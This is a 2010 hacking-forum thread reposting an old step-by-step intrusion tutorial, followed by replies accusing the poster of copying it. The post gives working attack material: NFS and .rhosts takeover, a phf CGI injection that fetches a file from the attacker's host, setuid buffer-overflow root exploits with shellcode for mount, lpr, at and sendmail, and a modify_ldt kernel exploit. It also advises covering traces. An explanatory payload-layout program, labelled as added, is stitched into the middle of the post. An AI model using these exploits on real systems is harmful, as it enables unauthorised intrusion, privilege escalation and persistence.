The place where the best programmers and game hackers come. The best programs and game hacks are here on PRO HAX BASE
 
Hacking a website only people in this forum will know

NegativeInfluence (Noob) | Posts: 18 | Join date: 2010-08-06
PostSubject: Hacking a website only people in this forum will know   Sat Aug 14, 2010 1:37 am

Hacking step by step: User's guide
__________________________

Well, howdy folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything...?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
________________

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the information below...
This file is for educational purposes ONLY...
I ain't responsible for any damages you made after reading this... (I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press <PgDown>.

Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactly for beginners, but it'll have to do.
What all hackers have to know is that there are 4 steps in hacking...
Step 1: Getting access to the site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactly what I meant.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search for another way
in.
What I was trying to do was to exploit an old security problem in most
SunOS versions that could allow a remote attacker to add a .rhosts to a user's
home directory... (That was possible if the site had mounted their home
directory.)
Let's see what happens...

mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr      victim2.site.com
/home     (everyone)
/cdrom    (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount

total 9
1 drwxrwxr-x  8 root   root  1024 Jul  4 20:34 ./
1 drwxr-xr-x 19 root   root  1024 Oct  8 13:42 ../
1 drwxr-xr-x  3 at1    users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x  8 ftp    wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x  3 john   100   1024 Jul  6 13:42 john/
1 drwxrx-r-x  3 139    100   1024 Sep 15 12:24 paul/
1 -rw-------  1 root   root   242 Mar  9  1997 sudoers
1 drwx------  3 test   100   1024 Oct  8 21:05 test/
1 drwx------ 15 102    100   1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (damn!) .bash_history and you might forget
it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/

total 9
1 drwxrwxr-x  8 root   root   1024 Jul  4 20:34 ./
1 drwxr-xr-x 19 root   root   1024 Oct  8 13:42 ../
1 drwxr-xr-x  3 at1    users  1024 Jun 22 19:18 at1/
1 dr-xr-xr-x  8 ftp    wheel  1024 Jul 12 14:20 ftp/
1 drwxrx-r-x  3 john   100    1024 Jul  6 13:42 john/
1 drwxrx-r-x  3 139    100    1024 Sep 15 12:24 paul/
1 -rw-------  1 root   root    242 Mar  9  1997 sudoers
1 drwx------  3 test   100    1024 Oct  8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/

So we own this guy's home directory...
mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOS ver.... (crap).
victim1:~$

This is the first method...
Another method could be to see if the site has an open port 80. That would
mean that the site has a web page.
(And that's very bad, 'cuz it usually is vulnerable.)
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor.)
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char **argv)
{
    struct hostent *host;
    int err, i, net;
    struct sockaddr_in sa;

    if (argc != 2) {
        printf("Usage: %s hostname\n", argv[0]);
        exit(1);
    }

    /* One full TCP connect() per port 1..1023. This completes the handshake
       on every open port, so the target's daemons see (and log) each probe,
       which is why the text points at nmap's stealth scans instead. */
    for (i = 1; i < 1024; i++) {
        memset(&sa, 0, sizeof sa);
        sa.sin_family = AF_INET;
        if (isdigit((unsigned char)*argv[1]))
            sa.sin_addr.s_addr = inet_addr(argv[1]);
        else if ((host = gethostbyname(argv[1])) != 0)
            memcpy(&sa.sin_addr, host->h_addr, sizeof sa.sin_addr);
        else {
            herror(argv[1]);
            exit(2);
        }
        sa.sin_port = htons(i);

        net = socket(AF_INET, SOCK_STREAM, 0);
        if (net < 0) {
            perror("\nsocket");
            exit(2);
        }
        err = connect(net, (struct sockaddr *)&sa, sizeof sa);
        if (err < 0) {
            /* refused or filtered: overwrite the status line and move on */
            printf("%s %-5d %s\r", argv[1], i, strerror(errno));
            fflush(stdout);
        } else {
            printf("%s %-5d accepted. \n", argv[1], i);
            if (shutdown(net, 2) < 0) {
                perror("\nshutdown");
                exit(2);
            }
        }
        close(net);
    }
    printf(" \r");
    fflush(stdout);
    return 0;
}
Well, now be very careful with the exploits below, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
syntax: lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a:

mysite:~>echo "+ +" > /tmp/rhosts
mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+ /root/.rhosts" | nc -v - 20 victim1.site.com 80

then

mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor.

Enough about this topic. (Besides, if you can finger the site, you can
figure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site.)

Step 2: Hacking r00t.
______

First you have to find the system it's running...
a). LINUX
ALL versions:
A big bug for all Linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996
   Discovered and Coded by Bloodmask & Vio
   Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* Returns the caller's stack pointer in %eax; 32-bit x86 only. The
   exploit uses it to guess where the target's stack will be. */
u_long get_esp(void) { __asm__("movl %esp, %eax"); }

int main(int argc, char **argv)
{
    /* execve("/bin/sh") shellcode; the syscall number is XORed in at run
       time so the string contains no NUL byte */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;
    /* fill start of buffer with nops */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    /* stick asm code into the buffer */
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    /* 8/4 = two copies of the guessed return address, then the NUL */
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    (void)alarm((u_int)0);
    printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
    /* the oversized buffer is passed as mount's first argument */
    execl(PATH_MOUNT, "mount", buff, NULL);
    return 0;
}

/* LPR exploit: I don't know the author... */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

/* Returns the caller's stack pointer in %eax; 32-bit x86 only. */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }

int main(void)
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    /* same execve("/bin/sh") shellcode as the mount exploit */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
        "\xd7\xff\xff\xff/bin/sh";
    int i;

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;
    /* NOP sled, then the shellcode, ending at BUFFER_SIZE */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    /* two copies of the guessed return address, then the terminating NUL */
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
    ptr = (char *)addr_ptr;
    *ptr = 0;
    /* the oversized buffer is handed to lpr as its -C (job class) argument */
    execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
    return 0;
}

b.) Versions 1.2.* to 1.3.2, NLSPATH env. variable exploit:

/* It's really annoying for users and good for me...
   AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* Returns the caller's stack pointer in %eax; 32-bit x86 only. */
u_long get_esp(void) { __asm__("movl %esp, %eax"); }

int main(int argc, char **argv)
{
    /* same execve("/bin/sh") shellcode as the mount exploit */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;
    /* NOP sled, then the shellcode, ending at BUFFER_SIZE */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    /* 8/4 = two copies of the guessed return address, then the NUL */
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    (void)alarm((u_int)0);
    printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
    /* the overflow is reached through the NLSPATH environment variable,
       not a command-line argument, so the buffer goes in via setenv() */
    setenv("NLSPATH", buff, 1);
    execl(path, "at", NULL);
    return 0;
}

SENDMAIL exploit: (don't try to chmod a-s this one...)

/* SENDMAIL Exploit for Linux */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* Returns the caller's stack pointer in %eax; 32-bit x86 only. */
u_long get_esp(void) { __asm__("movl %esp, %eax"); }

int main(int argc, char **argv)
{
    /* same shellcode as above, but it execs ./sh from the current
       directory instead of /bin/sh */
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET;

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;
    /* NOP sled, then the shellcode, ending at BUFFER_SIZE */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    /* 8/4 = two copies of the guessed return address, then the NUL */
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    (void)alarm((u_int)0);
    printf("SENDMAIL exploit discovered by me, _PHANTOM_ in 1997\n");
    /* delivered through the NLSPATH environment variable, like the at exploit */
    setenv("NLSPATH", buff, 1);
    execl(path, "sendmail", NULL);
    return 0;
}

MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)!!!)

/* this is a hack of a hack. a valid System.map was needed to get this sploit
   to werk.. but not any longer.. This sploit will give you root if the
   modify_ldt bug werks.. which I believe it does in any kernel before 1.3.20 ..
   QuantumG */
/* original code written by Morten Welinder.
 * this required 2 hacks to work on the 1.2.13 kernel that I've tested on:
 * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
 * 2. the _task in the System.map file has no leading underscore.
 * I am not sure at what point these were changed, if you are
 * using this on a newer kernel compile with NEWERKERNEL defined.
 *
 * -ReD */
#include <linux/ldt.h>
#include <stdio.h>
#include <linux/unistd.h>
#include <signal.h>
#ifdef NEWERKERNEL
#include <asm/sigcontext.h>
#endif
#define __KERNEL__
#include <linux/sched.h>
#include <linux/module.h>

static inline _syscall1(int, get_kernel_syms, struct kernel_sym *, table)
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)

#define KERNEL_BASE 0xc0000000

/*------------------------------------------------------------------------ */
/* Read one byte through a caller-supplied segment selector (loaded into %gs). */
static __inline__ unsigned char
__farpeek(int seg, unsigned ofs)
{
    unsigned char res;
    asm("mov %w1,%%gs ; gs; movb (%2),%%al"
        : "=a"(res)
        : "r"(seg), "r"(ofs));
    return res;
}

/*------------------------------------------------------------------------ */
/* Write one byte through a caller-supplied segment selector. */
static __inline__ void
__farpoke(int seg, unsigned ofs, unsigned char b)
{
    asm("mov %w0,%%gs ; gs; movb %b2,(%1)"
        : /* No results. */
        : "r"(seg), "r"(ofs), "r"(b));
}

/*------------------------------------------------------------------------ */
void memgetseg(void *dst, int seg, const void *src, int size)
{
    while (size-- > 0)
        *(char *)dst++ = __farpeek(seg, (unsigned)(src++));
}

/*------------------------------------------------------------------------ */
void memputseg(int seg, void *dst, const void *src, int size)
{
    while (size-- > 0)
        __farpoke(seg, (unsigned)(dst++), *(char *)src++);
}

/*------------------------------------------------------------------------ */
int main()
{
    int stat, i, j, k;
    struct modify_ldt_ldt_s ldt_entry;
    FILE *syms;
    char line[100];
    struct task_struct **task, *taskptr, thistask;
    struct kernel_sym blah[4096];

    printf("Bogusity checker for modify_ldt system call.\n");
    printf("Testing for page-size limit bug...\n");
    /* A page-granular data segment based just below the kernel boundary:
       a kernel that accepts it lets user code reach 0xc0000000-0xc0000ffe
       through the new selector. */
    ldt_entry.entry_number = 0;
    ldt_entry.base_addr = 0xbfffffff;
    ldt_entry.limit = 0;
    ldt_entry.seg_32bit = 1;
    ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
    ldt_entry.read_exec_only = 0;
    ldt_entry.limit_in_pages = 1;
    ldt_entry.seg_not_present = 0;
    stat = modify_ldt(1, &ldt_entry, sizeof(ldt_entry));
    if (stat)
        /* Continue after reporting error. */
        printf("This bug has been fixed in your kernel.\n");
    else {
        printf("Shit happens: ");
        printf("0xc0000000 - 0xc0000ffe is accessible.\n");
    }

    printf("Testing for expand-down limit bug...\n");
    /* An expand-down (stack-type) segment with limit 1: valid offsets are
       the ones above the limit, so a kernel that accepts it exposes the
       whole address space, kernel memory included. */
    ldt_entry.base_addr = 0x00000000;
    ldt_entry.limit = 1;
    ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
    ldt_entry.limit_in_pages = 0;
    stat = modify_ldt(1, &ldt_entry, sizeof(ldt_entry));
    if (stat) {
        printf("This bug has been fixed in your kernel.\n");
        return 1;
    } else {
        printf("Shit happens: ");
        /* The post's copy of the source stops here; the part that uses the
           remaining variables (System.map lookup and the walk of the task
           list through the bogus segment) is not included. */
    }
    return 0;
}
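Added example, not part of NegativeInfluence's post nor of the 1996/1997 exploit sources it reproduces. The four Linux local exploits above all build the same argument string: a NOP sled, the 50-byte execve("/bin/sh") shellcode placed so that it ends exactly at BUFFER_SIZE, then two copies of a guessed stack address, then a NUL. The C program below builds that string with the post's own BUFFER_SIZE and shellcode, reports where each piece lands, and adds the two checks the exploits skip: that no NUL byte appears before the terminator (argv and environment strings stop at the first NUL, so the overflow would never reach the saved return address) and that the guessed address itself is NUL-free. It also shows the bounded copy the overflowed programs lacked. The function names (build_payload, has_embedded_nul, ret_addr_usable, bounded_copy), the value 0xbffffbd0 standing in for get_esp() + offset, and the 256-byte sink are assumptions for illustration; nothing here is run against a setuid binary.

```c
/* payload_layout.c: added example, not code from the original post.
 * Builds the [NOP sled][shellcode][ret addr x N]\0 string the posted
 * mount/lpr/at/sendmail exploits hand to a setuid program, reports the
 * layout, and checks what silently breaks such a payload. Nothing here
 * touches a setuid binary; 0xbffffbd0 is an arbitrary stand-in
 * (assumption) for the exploits' get_esp() + offset guess. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 1024   /* same constant the posted exploits use */
#define N_RET       2      /* they append 8/4 = 2 address words     */

/* execve("/bin/sh") shellcode copied from the post: 50 bytes, NUL-free */
static const unsigned char execshell[] =
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
#define SHELL_LEN (sizeof execshell - 1)   /* exclude the literal's NUL */

struct layout {
    size_t shell_off;  /* offset of the shellcode's first byte */
    size_t ret_off;    /* offset of the first return-address word */
    size_t total;      /* bytes before the terminating NUL */
};

/* Global scratch space so the built payload can be inspected afterwards. */
unsigned char g_payload[4096];
struct layout g_layout;
char g_small[256];

/* Lay the payload out exactly as the post's exploits do: 0x90 up to
 * BUFFER_SIZE - shellcode length, shellcode ending at BUFFER_SIZE, n_ret
 * little-endian copies of ret_addr, then a NUL. Returns the byte count
 * before the NUL, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t cap, uint32_t ret_addr,
                     int n_ret, struct layout *lo)
{
    size_t total = BUFFER_SIZE + (size_t)n_ret * 4;
    if (cap < total + 1)
        return 0;
    size_t sled = BUFFER_SIZE - SHELL_LEN;
    memset(out, 0x90, sled);
    memcpy(out + sled, execshell, SHELL_LEN);
    for (int i = 0; i < n_ret; i++)          /* byte-wise store: no     */
        for (int b = 0; b < 4; b++)          /* (long *) alignment      */
            out[BUFFER_SIZE + i * 4 + b] =   /* assumption              */
                (unsigned char)(ret_addr >> (8 * b));
    out[total] = 0;
    if (lo) {
        lo->shell_off = sled;
        lo->ret_off = BUFFER_SIZE;
        lo->total = total;
    }
    return total;
}

/* 1 if a NUL sits inside the first len bytes: the target would receive a
 * truncated string and the overflow would stop short of the saved EIP. */
int has_embedded_nul(const unsigned char *p, size_t len)
{
    return memchr(p, 0, len) != NULL;
}

/* A guessed address with a zero byte cannot travel in argv or NLSPATH. */
int ret_addr_usable(uint32_t addr)
{
    for (int b = 0; b < 4; b++)
        if (((addr >> (8 * b)) & 0xff) == 0)
            return 0;
    return 1;
}

/* The check the overflowed programs lacked: refuse input that does not fit
 * the fixed buffer instead of copying it. 0 on success, -1 if rejected. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void)
{
    uint32_t guess = 0xbffffbd0u;   /* assumption, see header comment */
    size_t n = build_payload(g_payload, sizeof g_payload, guess, N_RET, &g_layout);
    printf("%zu bytes: shellcode at %zu, ret words at %zu\n",
           n, g_layout.shell_off, g_layout.ret_off);
    printf("embedded NUL: %d, ret addr usable: %d, fits 256-byte buffer: %s\n",
           has_embedded_nul(g_payload, n), ret_addr_usable(guess),
           bounded_copy(g_small, sizeof g_small, (char *)g_payload) ? "no" : "yes");
    return 0;
}
```

With the post's constants the string is 1032 bytes: 974 bytes of sled, the shellcode at offset 974, the two address words at 1024. The byte-wise store replaces the `(long *)` cast the exploits use, which works on 32-bit x86 but is an unaligned write elsewhere; the length check is what a fixed-size `strcpy` into a 256-byte buffer would have needed to survive this input.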
Tobi (Founder) | Posts: 168 | Join date: 2010-07-14 | Location: Behind you!
PostSubject: Re: Hacking a website only people in this forum will know   Sat Aug 14, 2010 3:49 pm

I had to move this topic to the tutorials. Also, nice tutorial ;)
NegativeInfluence (Noob) | Posts: 18 | Join date: 2010-08-06
PostSubject: Thanks   Sun Aug 15, 2010 2:58 am

It took a few days, but I don't think I'm a noob now. Can I get promoted?
Tobi (Founder) | Posts: 168 | Join date: 2010-07-14 | Location: Behind you!
PostSubject: Re: Hacking a website only people in this forum will know   Sun Aug 15, 2010 1:20 pm

NegativeInfluence wrote:
It took a few days, but I don't think I'm a noob now. Can I get promoted?
I guess you can be. Also, at 25 posts you become a beginner member. Anyway, you already know the simplest way to get the SPECIAL rank.
x-Pain-x (SPECIAL) | Posts: 115 | Join date: 2010-07-30 | Age: 21 | Location: Your house.
PostSubject: Re: Hacking a website only people in this forum will know   Mon Aug 16, 2010 10:06 pm

NegativeInfluence wrote:
Hacking step by step User's guide [...]

Lmao, wtf is this? XDDDDD
Where did you copy this source from?
NegativeInfluence (Noob) | Posts: 18 | Join date: 2010-08-06
PostSubject: Re: Hacking a website only people in this forum will know   Thu Aug 19, 2010 2:56 am

I actually didn't copy. You can call me a liar, but as long as I keep my word you can STFU. Now what, tempest?
x-Pain-x (SPECIAL) | Posts: 115 | Join date: 2010-07-30 | Age: 21 | Location: Your house.

PostSubject: Re: Hacking a website only people in this forum will know   Thu Aug 19, 2010 6:37 am

NegativeInfluence wrote:
I actually didn't copy. You can call me a liar, but as long as I keep my word you can STFU. Now what, tempest?

Rofl. I'm not stupid. I know who you are. You're wayyyy too retarded to even know what 90% of that code even means.

Roflmao. Did you copy the source from hack forums or something? (rolling eyes)

Alright, if you have any idea what you're talking about, what does the word "Null" mean?
Tobi (Founder) | Posts: 168 | Join date: 2010-07-14 | Location: Behind you!
PostSubject: Re: Hacking a website only people in this forum will know   Sat Aug 28, 2010 12:03 pm

Guys, take it easy, no fights. Also, the code looks pretty complicated.
K3nny (SPECIAL) | Posts: 16 | Join date: 2010-08-31
PostSubject: Re: Hacking a website only people in this forum will know   Tue Aug 31, 2010 4:45 pm

I've seen that EXACT tutorial in 10+ places. Give credit where credit is due. It's originally from Casihacks. CH may be dead, but you should still give credit and not claim it as yours. That should be a bannable offense.
Tobi (Founder) | Posts: 168 | Join date: 2010-07-14 | Location: Behind you!
PostSubject: Re: Hacking a website only people in this forum will know   Wed Sep 01, 2010 10:10 am

K3nny wrote:
I've seen that EXACT tutorial in 10+ places. Give credit where credit is due. It's originally from Casihacks. CH may be dead, but you should still give credit and not claim it as yours. That should be a bannable offense.
I also saw a lot of similar tutorials.